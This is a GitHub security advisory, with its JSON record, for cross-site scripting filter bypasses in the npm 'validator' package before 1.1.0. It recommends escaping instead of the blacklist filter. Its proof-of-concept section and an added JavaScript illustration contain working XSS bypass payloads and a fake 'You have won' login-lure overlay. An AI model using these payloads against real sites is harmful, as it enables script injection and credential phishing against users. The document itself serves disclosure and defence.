GHSA-Q4QQ-FM7Q-CWP5

Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2021-09-16 19:30
Summary
Multiple XSS Filter Bypasses in validator
Details

Versions of validator prior to 1.1.0 are affected by several cross-site scripting vulnerabilities due to bypasses discovered in the blacklist-based filter.

Proof of Concept

Various inputs that could bypass the filter were discovered:

Improper parsing of nested tags:

<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>

Incomplete filtering of javascript: URIs:

<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>

UI Redressing:

<div style="z-index: 9999999; background-color: green; width: 100%; height: 100%">
<h1>You have won</h1>Please click the link and enter your login details:
<a href="http://example.com/">http://good.com</a>
</div>

Bypass via Nested Forbidden Strings:

<scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt>

Additional bypasses were discovered by Krzysztof Kotowicz in 2012 while auditing CodeIgniter's XSS filtering function, on which this code was based.

Recommendation

If you are a developer currently using the xss filter function from the validator package, you should consider replacing it with the escape filter function from the same package. This function replaces all instances of angle brackets (<, >), ampersands, and quotation marks, so no HTML tags will be processed.
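As an added illustration (not code from the validator package or from the advisory), the following contrasts a constructed single-pass blacklist filter with the escape-everything approach the recommendation describes; `naiveBlacklistFilter`, `escapeHtml`, `containsTag` and the nested sample input are constructed for this example, and the remaining samples are quoted from the proof of concept above.

```javascript
// Added example, not code from the validator package or the advisory.
// It contrasts a constructed single-pass blacklist filter with the
// escape-everything approach the advisory recommends.

// Constructed stand-in for a blacklist filter: deletes a forbidden token.
// A single replace pass is the weakness: removing an inner copy of the
// token can reassemble an outer copy (the advisory's "nested forbidden
// strings" bypass).
function naiveBlacklistFilter(input) {
  return String(input).replace(/script/gi, '');
}

// Escape the characters that can switch HTML parsing context, so the
// browser renders the input as text instead of markup.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Defender-side check: would a browser still see a tag opener in the output?
function containsTag(output) {
  return /<[a-z!\/]/i.test(output);
}

// Constructed input following the nested-forbidden-strings pattern.
const NESTED_INPUT = '<scrscriptipt>prompt(1);</scrscriptipt>';

// Inputs quoted from the advisory's proof of concept, plus the constructed one.
const ADVISORY_SAMPLES = [
  '<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>',
  '<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>',
  NESTED_INPUT,
];

// true when escaping left no tag opener in any sample
function allNeutralizedByEscaping(samples) {
  return samples.every((s) => !containsTag(escapeHtml(s)));
}
```

Running `naiveBlacklistFilter(NESTED_INPUT)` yields a complete `<script>` element after one pass, while `allNeutralizedByEscaping(ADVISORY_SAMPLES)` is true because escaping removes nothing and therefore has nothing to reassemble.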


{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "validator"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2013-7454"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:50:57Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "Versions of `validator` prior to 1.1.0 are affected by several cross-site scripting vulnerabilities due to bypasses discovered in the blacklist-based filter.\n\n\n## Proof of Concept\nVarious inputs that could bypass the filter were discovered:\n\nImproper parsing of nested tags:\n\n```\n\u003cs \u003conmouseover=\"alert(1)\"\u003e \u003c;s onmouseover=\"alert(1)\"\u003eThis is a test\u003c/s\u003e\n```\n\nIncomplete filtering of javascript: URIs:\n\n```\n\u003ca href=\"javascriptJ a V a S c R iPt::alert(1)\" \"\u003cs\u003e\"\u003etest\u003c/a\u003e\n```\n\nUI Redressing:\n\n```\n\u003cdiv style=\"z-index: 9999999; background-color: green; width: 100%; height: 100%\"\u003e\n\u003ch1\u003eYou have won\u003c/h1\u003ePlease click the link and enter your login details:\n\u003ca href=\"http://example.com/\"\u003ehttp://good.com\u003c/a\u003e\n\u003c/div\u003e\n```\n\nBypass via Nested Forbidden Strings:\n\n```\n\u003cscrRedirecRedirect 302t 302ipt type=\"text/javascript\"\u003eprompt(1);\u003c/scrRedirecRedirect 302t 302ipt\u003e\n```\n\nAdditional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter\u0027s XSS filtering function, which this code was based off of.\n\n\n## Recommendation\n\nIf you are a developer currently using the xss filter function from the validator package, you should consider replacing it with the escape filter function from the same package. This function replaces all instances of angle brackets (\u003c, \u003e), ampersands, and quotation marks, so no HTML tags will be processed.",
  "id": "GHSA-q4qq-fm7q-cwp5",
  "modified": "2021-09-16T19:30:36Z",
  "published": "2017-10-24T18:33:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7454"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-q4qq-fm7q-cwp5"
    },
    {
      "type": "WEB",
      "url": "https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/41"
    },
    {
      "type": "WEB",
      "url": "http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Multiple XSS Filter Bypasses in validator"
}

